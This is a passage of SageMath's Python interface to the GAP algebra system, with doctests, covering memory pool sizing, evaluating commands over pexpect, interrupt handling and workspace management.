The GAP interface reads in even very long input (using files) in a
robust manner, as long as you are creating a new object.
.. note::
Using ``gap.eval`` for long input is much less robust, and is not
recommended.
::
sage: t = '"%s"'%10^10000 # ten thousand character string.
sage: a = gap(t)
Changing which GAP is used
--------------------------
Use this code to change which GAP interpreter is run. E.g.,
::
import sage.interfaces.gap
sage.interfaces.gap.gap_cmd = "/usr/local/bin/gap"
AUTHORS:
- David Joyner and William Stein: initial version(s)
- William Stein (2006-02-01): modified gap_console command so it uses
exactly the same startup command as Gap.__init__.
- William Stein (2006-03-02): added tab completions: gap.[tab], x =
gap(...), x.[tab], and docs, e.g., gap.function? and x.function?
"""
#*****************************************************************************
# Copyright (C) 2005 William Stein <wstein@gmail.com>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from __future__ import absolute_import, print_function
from .expect import Expect, ExpectElement, FunctionElement, ExpectFunction
from .gap_workspace import gap_workspace_file, prepare_workspace_dir
from sage.cpython.string import bytes_to_str
from sage.env import SAGE_EXTCODE
from sage.misc.misc import is_in_string
from sage.misc.cachefunc import cached_method
from sage.docs.instancedoc import instancedoc
from sage.interfaces.tab_completion import ExtraTabCompletion
from sage.structure.element import ModuleElement
import re
import os
import io
import pexpect
import time
import platform
import string
import warnings
WORKSPACE = gap_workspace_file()
first_try = True
gap_cmd = "gap -r"
if platform.processor() == 'ia64' and os.path.exists('/usr/bin/prctl'):
# suppress unaligned access to 0x..., ip=0x... warnings
gap_cmd = 'prctl --unaligned=silent ' + gap_cmd
def gap_command(use_workspace_cache=True, local=True):
if use_workspace_cache:
if local:
return "%s -L %s"%(gap_cmd, WORKSPACE), False
else:
# TO DO: Use remote workspace
return gap_cmd, False
else:
return gap_cmd, True
############ Set the GAP memory pool size
# you should always use get_gap_memory_pool_size() to access this value
gap_memory_pool_size = None
def set_gap_memory_pool_size(size_in_bytes):
"""
Set the desired gap memory pool size.
Subsequently started GAP instances will use this as default.
Already running instances are unchanged.
GAP will only reserve ``size_in_bytes`` address space. Unless you
actually start a big GAP computation, the memory will not be
used. However, corresponding swap space will be reserved so that
GAP will always be able to use the reserved address space if
needed. While nothing is actually written to disc as long as you
don't run a big GAP computation, the reserved swap space will not
be available for other processes.
INPUT:
- ``size_in_bytes`` -- integer. The desired memory pool size.
EXAMPLES::
sage: from sage.interfaces.gap import \
....: get_gap_memory_pool_size, set_gap_memory_pool_size
sage: n = get_gap_memory_pool_size()
sage: set_gap_memory_pool_size(n)
sage: n == get_gap_memory_pool_size()
True
sage: n # random output
1534059315
"""
global gap_memory_pool_size
gap_memory_pool_size = size_in_bytes
def get_gap_memory_pool_size():
"""
Get the gap memory pool size for new GAP processes.
EXAMPLES::
sage: from sage.interfaces.gap import get_gap_memory_pool_size
sage: get_gap_memory_pool_size() # random output
1534059315
"""
global gap_memory_pool_size
if gap_memory_pool_size is not None:
return gap_memory_pool_size
import psutil
from sage.misc.getusage import virtual_memory_limit
mem = psutil.virtual_memory()
swap = psutil.swap_memory()
vmax = virtual_memory_limit()
suggested_size = max(swap.free // 10, mem.available // 50)
# Don't eat all address space if the user set ulimit -v
suggested_size = min(suggested_size, vmax // 10)
# ~220MB is the minimum for long doctests
suggested_size = max(suggested_size, 250 * 1024**2)
return suggested_size
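# --- Illustrative worked example (not part of the original function) ---
# The heuristic above with made-up numbers: with 8 GiB of free swap, 16 GiB
# of available RAM and a 64 GiB ``ulimit -v``, the suggestion would be
#   max(8 GiB // 10, 16 GiB // 50) = max(~819 MiB, ~327 MiB) = ~819 MiB,
# which is neither capped by 64 GiB // 10 (~6.4 GiB) nor raised by the
# 250 MiB floor, so roughly 819 MiB is returned.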
def _get_gap_memory_pool_size_MB():
"""
Return the gap memory pool size suitable for usage on the GAP
command line.
The GAP 4.5.6 command line parser had issues with large numbers, so
we return it in megabytes.
OUTPUT:
String.
EXAMPLES::
sage: from sage.interfaces.gap import \
....: _get_gap_memory_pool_size_MB
sage: _get_gap_memory_pool_size_MB() # random output
'1467m'
"""
pool = get_gap_memory_pool_size()
pool = (pool // (1024**2)) + 1
return str(pool)+'m'
############ Classes with methods for both the GAP3 and GAP4 interface
class Gap_generic(ExtraTabCompletion, Expect):
r"""
Generic interface to the GAP3/GAP4 interpreters.
AUTHORS:
- William Stein and David Joyner (interface for GAP4)
- Franco Saliola (Feb 2010): refactored to separate out the generic
code
"""
_identical_function = "IsIdenticalObj"
def _synchronize(self, timeout=0.5, cmd='%s;'):
"""
Synchronize GAP pexpect interface.
See the base method
:meth:`~sage.interfaces.expect.Expect._synchronize` for more
details.
We override this method since we are looking at GAP package
mode output, which is quite different from the normal
(human-readable) interface.
EXAMPLES::
sage: gap('"ok"')
ok
sage: gap._expect.sendline() # now we are out of sync
1
sage: gap._synchronize()
sage: gap(123)
123
"""
if self._expect is None:
return
E = self._expect
from sage.misc.prandom import randrange
rnd = randrange(2147483647)
cmd = str(rnd)+';'
try:
E.sendline(cmd)
E.expect(r'@[nf][@J\s>]*'+str(rnd), timeout=timeout)
E.send(' ')
E.expect('@i', timeout=timeout)
except pexpect.TIMEOUT:
self.interrupt()
except pexpect.EOF:
self._crash_msg()
self.quit()
def interrupt(self, tries=None, timeout=1, quit_on_fail=True):
"""
Interrupt the GAP process
GAP installs a SIGINT handler; we call it directly instead of
trying to send Ctrl-C. Unlike
:meth:`~sage.interfaces.expect.Expect.interrupt`, we only try
once, since we know what we are doing.
Sometimes GAP dies while interrupting.
EXAMPLES::
sage: gap._eval_line('while(1=1) do i:=1;; od;', wait_for_prompt=False)
''
sage: rc = gap.interrupt(timeout=1)
sage: [ gap(i) for i in range(10) ] # check that it is still working
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TESTS::
sage: gap('"finished computation"'); gap.interrupt(); gap('"ok"')
finished computation
True
ok
"""
E = self._expect
if E is None:
return True
# GAP oddity: If a computation is running and we send Ctrl-C,
# it is stopped as expected. But if we are at the idle prompt,
# nothing is happening UNTIL we run the next command (which is
# then immediately interrupted).
# There is apparently also a race in GAP between the signal
# handler and input, if we don't wait a bit the result is
# unpredictable.
E.sendline(chr(3))
time.sleep(0.1)
E.sendline()
try:
# send a dummy command
E.sendline('224433409;')
# read everything up to the actual output of the command
E.expect(r'@[nf][@J\s>]*224433409', timeout=timeout)
E.send(' ')
# the following input prompt should be the current input
# prompt but GAP might be too confused to display it
# E.expect('@i', timeout=timeout)
# Ideally, we would be finished here. But sometimes GAP
# thinks it is still inside a do/od block. So we run some
# more plain commands to get back into sync. These might
# either complete successfully (output "@n+<number>") or
# return a "Syntax error: od expected@J@f +<number>"
E.sendline()
time.sleep(0.1)
E.sendline('224433437;')
E.expect(r'@[nf][@J\s>]*224433437', timeout=timeout)
E.sendline()
time.sleep(0.1)
E.sendline('224433479;')
E.expect(r'@[nf][@J\s>]*224433479', timeout=timeout)
E.send(' ')
# the following input prompt is now the current input prompt
E.expect('@i', timeout=timeout)
success = True
except (pexpect.TIMEOUT, pexpect.EOF):
# GAP died or hangs indefinitely
success = False
if not success and quit_on_fail:
self.quit()
return success
def _assign_symbol(self):
r"""
Return the assign symbol in GAP.
TESTS::
sage: gap = Gap()
sage: print(gap._assign_symbol())
:=
"""
return ":="
def _quit_string(self):
"""
Returns the string used to quit GAP.
EXAMPLES::
sage: gap._quit_string()
'quit;'
::
sage: g = Gap()
sage: a = g(2); g.is_running()
True
sage: g.quit()
sage: g.is_running()
False
"""
return 'quit;'
def _read_in_file_command(self, filename):
r"""
Returns the command used to read in a file in GAP.
EXAMPLES::
sage: gap._read_in_file_command('test')
'Read("test");'
::
sage: filename = tmp_filename()
sage: with open(filename, 'w') as f:
....: _ = f.write('xx := 22;\n')
sage: gap.read(filename)
sage: gap.get('xx').strip()
'22'
"""
return 'Read("%s");' % filename
def _continuation_prompt(self):
"""
Returns the continuation prompt in GAP.
EXAMPLES::
sage: gap._continuation_prompt()
'> '
"""
return '> '
def load_package(self, pkg, verbose=False):
"""
Load the Gap package with the given name.
If loading fails, raise a RuntimeError exception.
TESTS::
sage: gap.load_package("chevie")
Traceback (most recent call last):
...
RuntimeError: Error loading Gap package chevie. You may want to install gap_packages SPKG.
"""
if verbose:
print("Loading GAP package {}".format(pkg))
x = self.eval('LoadPackage("{}")'.format(pkg))
if x == 'fail':
raise RuntimeError("Error loading Gap package "+str(pkg)+". "+
"You may want to install gap_packages SPKG.")
def eval(self, x, newlines=False, strip=True, split_lines=True, **kwds):
r"""
Send the code in the string ``x`` to the GAP interpreter and return the
output as a string.
INPUT:
- ``x`` -- string containing GAP code.
- ``newlines`` -- bool (default: ``False``); if ``False``,
remove all backslash-newlines inserted by the GAP output
formatter.
- ``strip`` -- ignored
- ``split_lines`` -- bool (default: True); if True then each
line is evaluated separately. If False, then the whole
block of code is evaluated all at once.
EXAMPLES::
sage: gap.eval('2+2')
'4'
sage: gap.eval('Print(4); #test\n Print(6);')
'46'
sage: gap.eval('Print("#"); Print(6);')
'#6'
sage: gap.eval('4; \n 6;')
'4\n6'
sage: gap.eval('if 3>2 then\nPrint("hi");\nfi;')
'hi'
sage: gap.eval('## this is a test\nPrint("OK")')
'OK'
sage: gap.eval('Print("This is a test. Oh no, a #");# but this is a comment\nPrint("OK")')
'This is a test. Oh no, a #OK'
sage: gap.eval('if 4>3 then')
''
sage: gap.eval('Print("Hi how are you?")')
'Hi how are you?'
sage: gap.eval('fi')
''
TESTS:
Whitespace is not stripped from the front of the result
(:trac:`28439`)::
sage: gap.eval(r'Print(" -\n\\\\- ")')
' -\n\\\\-'
"""
# '"
#We remove all of the comments: On each line, we try
#to find a pound sign. If we find it, we check to see if
#it is occurring in a string. If it is not in a string, we
#strip off the comment.
if not split_lines:
input_line=str(x)
else:
input_line = ""
for line in str(x).rstrip().split('\n'):
pound_position = line.find('#')
while pound_position != -1:
if not is_in_string(line, pound_position):
line = line[:pound_position]
pound_position = line.find('#',pound_position+1)
input_line += " "+line
if not input_line.endswith(';'):
input_line += ';'
result = Expect.eval(self, input_line, **kwds)
if not newlines:
result = result.replace("\\\n","")
return result.rstrip()
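# --- Illustrative sketch (not part of the original module) ---
# The comment-stripping preprocessing done by eval() above, pulled out as a
# tiny standalone helper for clarity (it is not used anywhere). It relies on
# is_in_string(), already imported at the top of this module, to avoid
# cutting '#' characters that occur inside GAP string literals.
def _strip_gap_comments_sketch(code):
    """Hedged restatement of eval()'s preprocessing; illustrative only."""
    out = ""
    for line in str(code).rstrip().split('\n'):
        pound = line.find('#')
        while pound != -1:
            if not is_in_string(line, pound):
                line = line[:pound]
            pound = line.find('#', pound + 1)
        out += " " + line
    if not out.endswith(';'):
        out += ';'
    return out
# e.g. _strip_gap_comments_sketch('Print(4);# a comment') == ' Print(4);'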
def _execute_line(self, line, wait_for_prompt=True, expect_eof=False):
if self._expect is None: # interface is down
self._start()
E = self._expect
try:
if len(line) > 4095:
raise RuntimeError("Passing commands this long to gap would hang")
E.sendline(line)
except OSError:
raise RuntimeError("Error evaluating %s in %s"%(line, self))
if not wait_for_prompt:
return (b'',b'')
if len(line)==0:
return (b'',b'')
try:
terminal_echo = [] # to be discarded
normal_outputs = [] # GAP stdout
error_outputs = [] # GAP stderr
current_outputs = terminal_echo
while True:
x = E.expect_list(self._compiled_full_pattern)
current_outputs.append(E.before)
if x == 0: # @p
if E.after != b'@p1.':
warnings.warn(
"possibly wrong version of GAP package "
"interface. Crossing fingers and continuing.")
elif x == 1: #@@
current_outputs.append(b'@')
elif x == 2: #special char
c = ord(E.after[1:2]) - ord(b'A') + 1
s = bytes([c])
current_outputs.append(s)
elif x == 3: # garbage collection info, ignore
pass
elif x == 4: # @e -- break loop
E.sendline("quit;")
elif x == 5: # @c completion, doesn't seem to happen when -p is in use
warnings.warn("I didn't think GAP could do this")
elif x == 6:  # @f GAP error message
current_outputs = error_outputs
elif x == 7:  # @h help text, but this stopped happening with new help
warnings.warn("I didn't think GAP could do this")
elif x == 8:  # @i awaiting normal input
break
elif x == 9:  # @m finished running a child
pass  # there is no need to do anything
elif x == 10:  # @n normal output line
current_outputs = normal_outputs
elif x == 11:  # @r echoing input
current_outputs = terminal_echo
elif x == 12:  # @sN shouldn't happen
warnings.warn("this should never happen")
elif x == 13:  # @w GAP is trying to send a Window command
warnings.warn("this should never happen")
elif x == 14:  # @x seems to be safely ignorable
pass
elif x == 15:  # @z GAP starting a subprocess
pass  # there is no need to do anything
except pexpect.EOF:
if not expect_eof:
raise RuntimeError("Unexpected EOF from %s executing %s"%(self,line))
except IOError:
raise RuntimeError("IO Error from %s executing %s"%(self,line))
return (b"".join(normal_outputs), b"".join(error_outputs))
def _keyboard_interrupt(self):
"""
TESTS:
We check that the gap interface behaves correctly after an
interrupt::
sage: gap(2)
2
sage: try:
....: alarm(0.5)
....: gap.eval('while(1=1) do i:=1;; od;', wait_for_prompt=True)
....: except KeyboardInterrupt:
....: pass
sage: gap(2)
2
"""
self.quit()
raise KeyboardInterrupt("Ctrl-c pressed while running %s"%self)
def _eval_line(self, line, allow_use_file=True, wait_for_prompt=True, restart_if_needed=True):
r"""
Evaluate a line of commands.
REMARK:
By default, a long command (length exceeding ``self._eval_using_file_cutoff``)
is evaluated using :meth:`_eval_line_using_file`.
If the command can not be evaluated since the interface
has crashed, it is automatically restarted and tried
again *once*.
If the optional ``wait_for_prompt`` is ``False`` then even a very long line
will not be evaluated by :meth:`_eval_line_using_file`, since this does not
support the ``wait_for_prompt`` option.
INPUT:
- ``line`` -- (string) a command.
- ``allow_use_file`` (optional bool, default ``True``) --
allow to evaluate long commands using :meth:`_eval_line_using_file`.
- ``wait_for_prompt`` (optional bool, default ``True``) --
wait until the prompt appears in the sub-process' output.
- ``restart_if_needed`` (optional bool, default ``True``) --
If it is ``True``, the command is evaluated
a second time after restarting the interface, if an
``EOFError`` occurred.
TESTS::
sage: gap._eval_line('2+2;')
'4'
We test the ``wait_for_prompt`` option by sending a command that
creates an infinite loop in the GAP sub-process. But if we don't
wait for the prompt to appear in the output, we can interrupt
the loop without raising a KeyboardInterrupt. At the same time,
we test that the line is not forwarded to :meth:`_eval_line_using_file`,
since that method would not support the ``wait_for_prompt`` option::
sage: cutoff = gap._eval_using_file_cutoff
sage: gap._eval_using_file_cutoff = 4
sage: gap._eval_line('while(1=1) do i:=1;; od;', wait_for_prompt=False)
''
sage: rc = gap.interrupt(timeout=1)
sage: gap._eval_using_file_cutoff = cutoff
The following tests against a bug fixed at :trac:`10296`::
sage: gap(3)
3
sage: gap.eval('quit;')
''
sage: a = gap(3)
** Gap crashed or quit executing '\$sage...:=3;;' **
Restarting Gap and trying again
sage: a
3
"""
expect_eof = self._quit_string() in line
try:
if self._expect is None:
self._start()
if allow_use_file and wait_for_prompt and len(line) > self._eval_using_file_cutoff:
return self._eval_line_using_file(line)
(normal, error) = self._execute_line(line, wait_for_prompt=wait_for_prompt,
expect_eof=expect_eof)
# The internal method _execute_line returns bytes but the bytes it
# returns should contain text (any terminal commands and other
# garbage should be filtered out by this point); here we decode
# them (on Python 3), currently just using the default encoding
normal, error = bytes_to_str(normal), bytes_to_str(error)
if len(error):
if 'Error, Rebuild completion files!' in error:
error += "\nRunning gap_reset_workspace()..."
self.quit()
gap_reset_workspace()
error = error.replace('\r','')
raise RuntimeError("%s produced error output\n%s\n executing %s"%(self, error,line))
if not len(normal):
return ''
if isinstance(wait_for_prompt, str) and normal.endswith(wait_for_prompt):
n = len(wait_for_prompt)
elif normal.endswith(bytes_to_str(self._prompt)):
n = len(self._prompt)
elif normal.endswith(self._continuation_prompt()):
n = len(self._continuation_prompt())
else:
n = 0
out = normal[:-n]
if len(out) and out[-1] == "\n":
out = out[:-1]
return out
except (RuntimeError, TypeError, pexpect.ExceptionPexpect) as exc:
if not self._isalive():
# We can't distinguish a plain EOF from an unexpectedly killed
# process because pexpect catches EOFs and re-raises them.
# But if we *were* expecting EOF then we should just let it
# fail silently and return
if expect_eof:
return ''
print("** %s crashed or quit executing '%s' **" % (self, line))
print("Restarting %s and trying again" % self)
self._start()
if line != '':
return self._eval_line(line, allow_use_file=allow_use_file)
else:
return ''
else:
raise RuntimeError(exc)
except KeyboardInterrupt:
self._keyboard_interrupt()
raise KeyboardInterrupt("Ctrl-c pressed while running %s"%self)
def unbind(self, var):
"""
Clear the variable named var.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
sage: gap.unbind('x')
sage: gap.get('x')
Traceback (most recent call last):
...
RuntimeError: Gap produced error output
Error, Variable: 'x' must have a value
...
"""
self.eval('Unbind(%s)'%var)
self.clear(var)
def _contains(self, v1, v2):
"""
EXAMPLES::
sage: Integers = gap('Integers')
sage: two = gap(2)
sage: gap._contains(two.name(), Integers.name())
True
::
sage: 2 in gap('Integers')
True
"""
return self.eval('%s in %s'%(v1,v2)) == "true"
def _true_symbol(self):
"""
Returns the symbol for truth in GAP.
EXAMPLES::
sage: gap._true_symbol()
'true'
sage: gap(2) == gap(2)
True
"""
return "true"
def _false_symbol(self):
"""
Returns the symbol for falsity in GAP.
EXAMPLES::
sage: gap._false_symbol()
'false'
sage: gap(2) == gap(3)
False
"""
return "false"
def _equality_symbol(self):
"""
Returns the symbol for equality in GAP.
EXAMPLES::
sage: gap._equality_symbol()
'='
sage: gap(2) == gap(3)
False
sage: gap(2) == gap(2)
True
"""
return "="
def version(self):
"""
Returns the version of GAP being used.
EXAMPLES::
sage: print(gap.version())
4...
"""
return self.eval('VERSION')[1:-1]
def function_call(self, function, args=None, kwds=None):
"""
Calls the GAP function with args and kwds.
EXAMPLES::
sage: gap.function_call('SymmetricGroup', [5])
SymmetricGroup( [ 1 .. 5 ] )
If the GAP function does not return a value, but prints something
to the screen, then a string of the printed output is returned.
::
sage: s = gap.function_call('Display', [gap.SymmetricGroup(5).CharacterTable()])
sage: type(s)
<class 'sage.interfaces.interface.AsciiArtString'>
sage: s.startswith('CT')
True
TESTS:
If the function call is too long, two ``gap.eval`` calls are made
since returned values from commands in a file cannot be handled
properly::
sage: g = Gap()
sage: g.function_call("ConjugacyClassesSubgroups", sage.interfaces.gap.GapElement(g, 'SymmetricGroup(2)', name = 'a_variable_with_a_very_very_very_long_name'))
[ ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( () )),
ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( [ (1,2) ] )) ]
When the command itself is so long that it warrants use of a temporary
file to be communicated to GAP, this does not cause problems since
the file will contain a single command::
sage: g.function_call("ConjugacyClassesSubgroups", sage.interfaces.gap.GapElement(g, 'SymmetricGroup(2)', name = 'a_variable_with_a_name_so_very_very_very_long_that_even_by_itself_will_make_expect_use_a_file'))
[ ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( () )),
ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( [ (1,2) ] )) ]
"""
args, kwds = self._convert_args_kwds(args, kwds)
self._check_valid_function_name(function)
#Here we have to do some magic because not all GAP
#functions return a value. If you try to store their
#results to a variable, then GAP will complain. Thus, before
#we evaluate the function, we make it so that the marker string
#is in the 'last' variable in GAP. If the function returns a
#value, then that value will be in 'last', otherwise it will
#be the marker.
marker = '__SAGE_LAST__:="__SAGE_LAST__";;'
cmd = "%s(%s);;"%(function, ",".join([s.name() for s in args]+
['%s=%s'%(key,value.name()) for key, value in kwds.items()]))
if len(marker) + len(cmd) <= self._eval_using_file_cutoff:
# We combine the two commands so we only run eval() once and the
# only output would be from the second command
res = self.eval(marker+cmd)
else:
self.eval(marker)
res = self.eval(cmd)
if self.eval(self._identical_function + '(last,__SAGE_LAST__)') != 'true':
return self.new('last2;')
else:
if res.strip():
from sage.interfaces.interface import AsciiArtString
return AsciiArtString(res)
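# --- Illustrative command strings (not part of the original module) ---
# Hedged example of what function_call() above sends to GAP for
# gap.function_call('SymmetricGroup', [5]) (the \$sage1 variable name is
# hypothetical):
#
#   __SAGE_LAST__:="__SAGE_LAST__";;SymmetricGroup(\$sage1);;
#
# Afterwards the IsIdenticalObj(last,__SAGE_LAST__) test itself becomes
# 'last', so if the function returned a value it is reachable as 'last2';
# otherwise whatever the function printed is wrapped in an AsciiArtString.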
def get_record_element(self, record, name):
r"""
Return the element of a GAP record identified by ``name``.
INPUT:
- ``record`` -- a GAP record
- ``name`` -- str
OUTPUT:
- :class:`GapElement`
EXAMPLES::
sage: rec = gap('rec( a := 1, b := "2" )')
sage: gap.get_record_element(rec, 'a')
1
sage: gap.get_record_element(rec, 'b')
2
TESTS::
sage: rec = gap('rec( a := 1, b := "2" )')
sage: type(gap.get_record_element(rec, 'a'))
<class 'sage.interfaces.gap.GapElement'>
"""
return self('%s.%s' % (record.name(), name))
# We need to inherit from ModuleElement to support
# sage.structure.coerce_actions.ModuleAction and it needs to be first
# in the MRO because extension types should always come first.
@instancedoc
class GapElement_generic(ModuleElement, ExtraTabCompletion, ExpectElement):
r"""
Generic interface to the GAP3/GAP4 interpreters.
AUTHORS:
- William Stein and David Joyner (interface for GAP4)
- Franco Saliola (Feb 2010): refactored to separate out the generic
code
"""
def _add_(self, other):
"""
EXAMPLES::
sage: a = gap(1)
sage: a + a
2
"""
# This is just a copy of ExpectElement._add_ to fix the fact
# that the abstract method ModuleElement._add_ comes first in
# the MRO.
return self._operation("+", other)
def __bool__(self):
"""
EXAMPLES::
sage: bool(gap(2))
True
sage: gap(0).bool()
False
sage: gap('false').bool()
False
"""
P = self._check_valid()
return self != P(0) and repr(self) != 'false'
__nonzero__ = __bool__
def __len__(self):
"""
EXAMPLES::
sage: v = gap('[1,2,3]'); v
[ 1, 2, 3 ]
sage: len(v)
3
len is also called implicitly by if::
sage: if gap('1+1 = 2'):
....: print("1 plus 1 does equal 2")
1 plus 1 does equal 2
::
sage: if gap('1+1 = 3'):
....: print("it is true")
....: else:
....: print("it is false")
it is false
"""
P = self.parent()
if P.eval('%s = true'%self.name()) == 'true':
return 1
elif P.eval('%s = false'%self.name()) == 'true':
return 0
else:
return int(self.Length())
def is_string(self):
"""
Tell whether this element is a string.
EXAMPLES::
sage: gap('"abc"').is_string()
True
sage: gap('[1,2,3]').is_string()
False
"""
return bool(self.IsString())
def _matrix_(self, R):
r"""
Return matrix over the (Sage) ring R determined by self, where self
should be a Gap matrix.
EXAMPLES::
sage: s = gap("(Z(7)^0)*[[1,2,3],[4,5,6]]"); s
[ [ Z(7)^0, Z(7)^2, Z(7) ], [ Z(7)^4, Z(7)^5, Z(7)^3 ] ]
sage: s._matrix_(GF(7))
[1 2 3]
[4 5 6]
::
sage: s = gap("[[1,2], [3/4, 5/6]]"); s
[ [ 1, 2 ], [ 3/4, 5/6 ] ]
sage: m = s._matrix_(QQ); m
[ 1 2]
[3/4 5/6]
sage: parent(m)
Full MatrixSpace of 2 by 2 dense matrices over Rational Field
::
sage: s = gap('[[Z(16),Z(16)^2],[Z(16)^3,Z(16)]]')
sage: s._matrix_(GF(16,'a'))
[ a a^2]
[a^3 a]
"""
v = self.DimensionsMat()
n = int(v[1])
m = int(v[2])
from sage.matrix.matrix_space import MatrixSpace
M = MatrixSpace(R, n, m)
entries = [[R(self[r,c]) for c in range(1,m+1)] for r in range(1,n+1)]
return M(entries)
############
class Gap(Gap_generic):
r"""
Interface to the GAP interpreter.
AUTHORS:
- William Stein and David Joyner
"""
def __init__(self, max_workspace_size=None,
maxread=None, script_subdirectory=None,
use_workspace_cache=True,
server=None,
server_tmpdir=None,
logfile=None,
seed=None,
env={}):
"""
EXAMPLES::
sage: gap == loads(dumps(gap))
True
"""
self.__use_workspace_cache = use_workspace_cache
cmd, self.__make_workspace = gap_command(use_workspace_cache, server is None)
# -b: suppress banner
# -p: enable "package output mode"; this confusingly named option
# causes GAP to output special control characters that are normally
# intended for communication with a window manager (i.e. for xgap)
# but that we also use to control GAP with pexpect
# -T: disable interactive break loop when encountering errors
# -E: disable readline support
cmd += " -b -p -T -E"
if max_workspace_size is None:
max_workspace_size = _get_gap_memory_pool_size_MB()
cmd += ' -o ' + str(max_workspace_size)
cmd += ' -s ' + str(max_workspace_size)
cmd += ' -m 64m ' # attempt at a workaround for http://tracker.gap-system.org/issues/224
cmd += ' ' + os.path.join(SAGE_EXTCODE, 'gap', 'sage.g')
Expect.__init__(self,
name='gap',
prompt='gap> ',
command=cmd,
maxread=maxread,
server=server,
server_tmpdir=server_tmpdir,
script_subdirectory=script_subdirectory,
restart_on_ctrlc=True,
verbose_start=False,
logfile=logfile,
eval_using_file_cutoff=100,
env=env)
self.__seq = 0
self._seed = seed
def set_seed(self,seed=None):
"""
Set the seed for gap interpreter.
The seed should be an integer.
EXAMPLES::
sage: g = Gap()
sage: g.set_seed(0)
0
sage: [g.Random(1,10) for i in range(5)]
[2, 3, 3, 4, 2]
"""
if seed is None:
seed = self.rand_seed()
self.eval("Reset(GlobalMersenneTwister,%d);;" % seed)
self.eval("Reset(GlobalRandomSource,%d);;" % seed)
self._seed = seed
return seed
def __reduce__(self):
"""
EXAMPLES::
sage: gap.__reduce__()
(<function reduce_load_GAP at 0x...>, ())
sage: f, args = _
sage: f(*args)
Gap
"""
return reduce_load_GAP, tuple([])
def _next_var_name(self):
r"""
Returns the next unused variable name.
Note that names starting with dollar signs are valid GAP
identifiers, but need to be escaped with a backslash starting
with GAP-4.8.
EXAMPLES::
sage: g = Gap()
sage: g._next_var_name()
'\\$sage1'
sage: g(2)^2
4
sage: g._next_var_name()
'\\$sage...'
"""
if len(self._available_vars) != 0:
v = self._available_vars[0]
del self._available_vars[0]
return v
self.__seq += 1
return r'\$sage%s'%self.__seq
def _start(self):
"""
EXAMPLES::
sage: g = Gap()
sage: g.is_running()
False
sage: g._start()
sage: g.is_running()
True
sage: g.quit()
"""
if self.__use_workspace_cache:
from sage.libs.gap.saved_workspace import timestamp
try:
# Check to see if we need to auto-regenerate the gap
# workspace, i.e., if the gap script is more recent
# than the saved workspace, which signals that gap has
# been upgraded.
if os.path.getmtime(WORKSPACE) < timestamp():
raise OSError("GAP workspace too old")
# Set the modification time of the workspace to the
# current time. This ensures the workspace doesn't
# get deleted too soon by gap_reset_workspace().
os.utime(WORKSPACE, None)
except OSError:
gap_reset_workspace(verbose=False)
global first_try
n = self._session_number
try:
Expect._start(self, "Failed to start GAP.")
except Exception:
if self.__use_workspace_cache and first_try:
first_try = False
self.quit()
gap_reset_workspace(verbose=False)
Expect._start(self, "Failed to start GAP.")
self._session_number = n
self.__make_workspace = False
else:
raise
if self.__use_workspace_cache and self.__make_workspace:
self.save_workspace()
# Now, as self._expect exists, we can compile some useful pattern:
self._compiled_full_pattern = self._expect.compile_pattern_list([
r'@p\d+\.','@@','@[A-Z]',r'@[123456!"#$%&][^+]*\+',
'@e','@c','@f','@h','@i','@m','@n','@r',r'@s\d',r'@w.*\+','@x','@z'])
# read everything up to the first "ready" prompt
self._expect.expect("@i")
# set random seed
self.set_seed(self._seed)
def _function_class(self):
"""
Returns the GapFunction class.
EXAMPLES::
sage: gap._function_class()
<class 'sage.interfaces.gap.GapFunction'>
::
sage: type(gap.Order)
<class 'sage.interfaces.gap.GapFunction'>
"""
return GapFunction
def cputime(self, t=None):
r"""
Returns the amount of CPU time that the GAP session has used. If
``t`` is not None, then it returns the difference
between the current CPU time and ``t``.
EXAMPLES::
sage: t = gap.cputime()
sage: t #random
0.13600000000000001
sage: gap.Order(gap.SymmetricGroup(5))
120
sage: gap.cputime(t) #random
0.059999999999999998
"""
if t is not None:
return self.cputime() - t
else:
self.eval('_r_ := Runtimes();')
r = sum(eval(self.eval('[_r_.user_time, _r_.system_time, _r_.user_time_children, _r_.system_time_children]')))
return r/1000.0
def save_workspace(self):
r"""
Save the GAP workspace.
TESTS:
We make sure that :trac:`9938` (GAP does not start if the path
to the GAP workspace file contains more than 82 characters) is
fixed::
sage: ORIGINAL_WORKSPACE = sage.interfaces.gap.WORKSPACE
sage: sage.interfaces.gap.WORKSPACE = os.path.join(SAGE_TMP, "gap" + "0"*(80-len(SAGE_TMP)))
sage: gap = Gap()
sage: gap('3+2') # long time (4s on sage.math, 2013)
5
sage: sage.interfaces.gap.WORKSPACE = ORIGINAL_WORKSPACE
"""
prepare_workspace_dir()
# According to the GAP Reference Manual,
# [http://www.gap-system.org/Manuals/doc/htm/ref/CHAP003.htm#SSEC011.1]
# SaveWorkspace can only be used at the main gap> prompt. It cannot
# be included in the body of a loop or function, or called from a
# break loop.
from sage.misc.temporary_file import atomic_write
with atomic_write(WORKSPACE) as f:
f.close()
self.eval('SaveWorkspace("%s");'%(f.name), allow_use_file=False)
# Todo -- this -- but there is a tricky "when does it end" issue!
# Maybe do via a file somehow?
def help(self, s, pager=True):
"""
Print help on a given topic.
EXAMPLES:
Note: In order to ensure consistent unicode handling from GAP we
start a GAP instance with a forced UTF-8 locale::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap.help('SymmetricGroup', pager=False))
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
<BLANKLINE>
"""
if self.is_remote():
tmp_to_use = self._remote_tmpfile()
else:
tmp_to_use = self._local_tmpfile()
self.eval('SetGAPDocTextTheme("none")')
gap_encoding = str(self('GAPInfo.TermEncoding;'))
self.eval(r'\$SAGE.tempfile := "%s";' % tmp_to_use)
line = Expect.eval(self, "? %s" % s)
Expect.eval(self, "? 1")
match = re.search(r"Page from (\d+)", line)
if match is None:
print(line)
else:
(sline,) = match.groups()
sline = int(sline) - 1
